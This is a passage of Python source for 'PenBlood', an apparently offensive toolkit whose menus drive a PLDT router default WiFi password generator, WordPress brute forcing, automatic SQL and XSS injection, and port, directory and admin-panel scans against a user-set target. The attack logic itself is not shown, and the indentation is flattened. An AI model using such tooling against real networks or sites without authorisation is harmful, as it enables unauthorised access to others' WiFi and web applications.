mac5 = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
gpldt_password_calculator1, gpldt_password_calculator2, gpldt_password_calculator3, gpldt_password_calculator4, gpldt_password_calculator5 = cgenerator.pldt_password_calculator(digit5, mac5)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('[#] - Possible Password of the PLDT WIFI:')
print ('\nFOR : PLDTHOMEDSL, PLDTmyDSLPAL, and PLDTmyDSLBiz')
for i in gpldt_password_calculator1:
print (' > ' + i)
print ('\nFOR : PLDTHOMEDSLxxxxx')
for i in gpldt_password_calculator2:
print (' > ' + i)
print ('\nFOR : PLDTHOMEFIBR_xxxxxx')
print (' > ' + gpldt_password_calculator3)
print ('\nFOR : PLDTHOMEFIBRxxxxxx')
for i in gpldt_password_calculator4:
print (' > ' + i)
print ('\nFOR : HomeBro_Ultera')
print (' > ' + gpldt_password_calculator5)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 4:
if sys.version_info[0] == 3:
text = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
text = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gtext_to_hash = cgenerator.text_to_hash(text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (gtext_to_hash)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 90:
main()
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
def web_application_attack():
global cweb_application_atttack
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}Wordpress
{2}02{3}) {5}SQL Injection
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
cweb_application_atttack = WebApplicationAttack()
if choice == 1:
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}WPScan (Kali Linux) - Install manually on other OS
{2}02{3}) {5}WPScan Bruteforce (Kali Linux) - Install manually on other OS
{2}03{3}) {5}Wordpress Plugins Vulnerability Checker
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice1 = int(input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice1 = int(raw_input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
if choice1 == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan = cweb_application_atttack.wp_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
elif choice1 == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan_bruteforce = cweb_application_atttack.wp_scan_bruteforce(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 3: # Exploit-DB.com
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wordpress_plugin_checker = cweb_application_atttack.wordpress_vulnerability_check(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 90:
main()
elif choice1 == 95:
            print ('{2}[{1}#{2}] {3}- {4}Please don\'t put a trailing "/" at the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
set_target(target, 2)
elif choice1 == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif choice == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_auto_sql_injection = cweb_application_atttack.auto_sql_injection(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
print ('')
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice == 3:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
            wap_auto_xss_injection = cweb_application_atttack.auto_xss_injection(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
print ('')
web_application_attack()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice == 90:
main()
elif choice == 95:
print ('')
        print ('{2}[{1}#{2}] {3}- {4}Please don\'t put a trailing "/" at the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PenBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
print ('')
set_target(target, 2)
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
def web_pentest():
global web_pentest_output
global web_pentest_outputfile
print ("""{3}[ {5}Web Pentest {3}]
{2}01{3}) {5}Banner Grab
{2}02{3}) {5}Whois
{2}03{3}) {5}Traceroute
{2}04{3}) {5}DNS Record
{2}05{3}) {5}Reverse DNS Lookup
{2}06{3}) {5}Zone Transfer Lookup
{2}07{3}) {5}Port Scan
{2}08{3}) {5}Admin Panel Scan
{2}09{3}) {5}Subdomain Scan
{2}10{3}) {5}CMS Identify
{2}11{3}) {5}Reverse IP Lookup
{2}12{3}) {5}Subnet Lookup
{2}13{3}) {5}Extract Page Links
{2}14{3}) {5}Directory Fuzz
{2}15{3}) {5}File Fuzz
{2}16{3}) {5}Shodan Search
{2}17{3}) {5}Shodan Host Lookup
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
cweb_pentest = WebPentest()
if choice == 1:
try:
wp_banner_grab = cweb_pentest.banner_grab(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Banner Grab Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_banner_grab)
web_pentest_outputfile.write('\n' + wp_banner_grab)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 2:
try:
wp_whois = cweb_pentest.whois(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Whois Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_whois)
web_pentest_outputfile.write('\n' + str(wp_whois))
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 3:
try:
wp_traceroute = cweb_pentest.traceroute(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Traceroute Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_traceroute)
web_pentest_outputfile.write('\n' + wp_traceroute)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 4:
try:
wp_dns_record = cweb_pentest.dns_record(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] DNS Record Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_dns_record:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 5:
try:
wp_reverse_dns_lookup = cweb_pentest.reverse_dns_lookup(ip)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse DNS Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_dns_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_dns_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 6:
try:
wp_zone_transfer_lookup = cweb_pentest.zone_transfer_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Zone Transfer Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_zone_transfer_lookup)
web_pentest_outputfile.write('\n' + wp_zone_transfer_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 7:
if sys.version_info[0] == 3:
            port_end = int(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
            port_end = int(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_port_scan = cweb_pentest.port_scan(hostname, port_end)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Port Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_port_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 8:
try:
wp_admin_panel_scan = cweb_pentest.admin_panel_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Admin Panel Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_admin_panel_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 9:
if sys.version_info[0] == 3:
            subdomain_list = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
            subdomain_list = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subdomain_scan = cweb_pentest.subdomain_scan(hostname, subdomain_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
so_200, so_301, so_302, so_403 = wp_subdomain_scan
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Subdomain Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in so_200:
print ('[+] 200 - ' + i)
web_pentest_outputfile.write('[+] 200 - ' + i + '\n')
        for i in so_301:
            print ('[!] 301 - ' + i)
            web_pentest_outputfile.write('[!] 301 - ' + i + '\n')
        for i in so_302:
            print ('[!] 302 - ' + i)
            web_pentest_outputfile.write('[!] 302 - ' + i + '\n')
        for i in so_403:
            print ('[!] 403 - ' + i)
            web_pentest_outputfile.write('[!] 403 - ' + i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 10:
try:
wp_cms_detect = cweb_pentest.cms_detect(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] CMS Detect - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_cms_detect)
web_pentest_outputfile.write('\n' + wp_cms_detect)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 11:
try:
wp_reverse_ip_lookup = cweb_pentest.reverse_ip_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse IP Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_ip_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_ip_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 12:
if sys.version_info[0] == 3:
subnet_input = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subnet_input = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subnet_lookup = cweb_pentest.subnet_lookup(subnet_input)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (wp_subnet_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 13:
try:
wp_links_extract = cweb_pentest.links_extract(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Links Extract Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_links_extract)
web_pentest_outputfile.write('\n' + wp_links_extract)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 14:
if sys.version_info[0] == 3:
directory_list = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
directory_list = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_directory_fuzz1, wp_directory_fuzz2, wp_directory_fuzz3 = cweb_pentest.directory_fuzz(url, directory_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Directory Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_directory_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_directory_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
        web_pentest_outputfile.write('Response 403:\n')
print ('[+] Response 403')
for i in wp_directory_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 15:
if sys.version_info[0] == 3:
file_list = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
file_list = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_file_fuzz1, wp_file_fuzz2, wp_file_fuzz3 = cweb_pentest.file_fuzz(url, file_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] File Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_file_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_file_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 403:\n')
print ('[+] Response 403')
for i in wp_file_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 16:
if sys.version_info[0] == 3:
shodan_search_query = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename:
shodan_search_output_filename = shodan_search_output_filename + '.txt'
else:
shodan_search_output_filename = shodan_search_output_filename
if sys.version_info[0] == 2:
shodan_search_query = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
            SHODAN_API_KEY = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
            shodan_search_output_filename = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename:
shodan_search_output_filename = shodan_search_output_filename + '.txt'
else:
shodan_search_output_filename = shodan_search_output_filename
shodan_search_output = open('outputs/web_pentest/shodan/' + shodan_search_output_filename, 'a+')
shodan_search_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_search = cweb_pentest.shodan_search(shodan_search_query, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('------------------------------.\n{1}[{2}#{1}] {3}- {4}Results Found: {5}|\n------------------------------.{0}'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
shodan_search_output.write('\n------------------------------.\n[#] - Results Found: {5}|\n------------------------------.\n'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
for i in wp_shodan_search['matches']:
try:
print ("""{6}[{7}#{6}] {8}- {9}Timestamp:{10} {0}
{6}[{7}+{6}] {8}- {9}IP:{10} {1}
{6}[{7}+{6}] {8}- {9}Port:{10} {2}
{6}[{7}+{6}] {8}- {9}OS:{10} {3}
{6}[{7}+{6}] {8}- {9}Hostnames:{10} {4}
{6}[{7}+{6}] {8}- {9}Data:{10}
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
shodan_search_output.write("""[#] - Timestamp: {0}
[+] - IP: {1}
[+] - Port: {2}
[+] - OS: {3}
[+] - Hostnames: {4}
[+] - Data:
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
except:
pass
shodan_search_output.write('\n\n')
shodan_search_output.close()
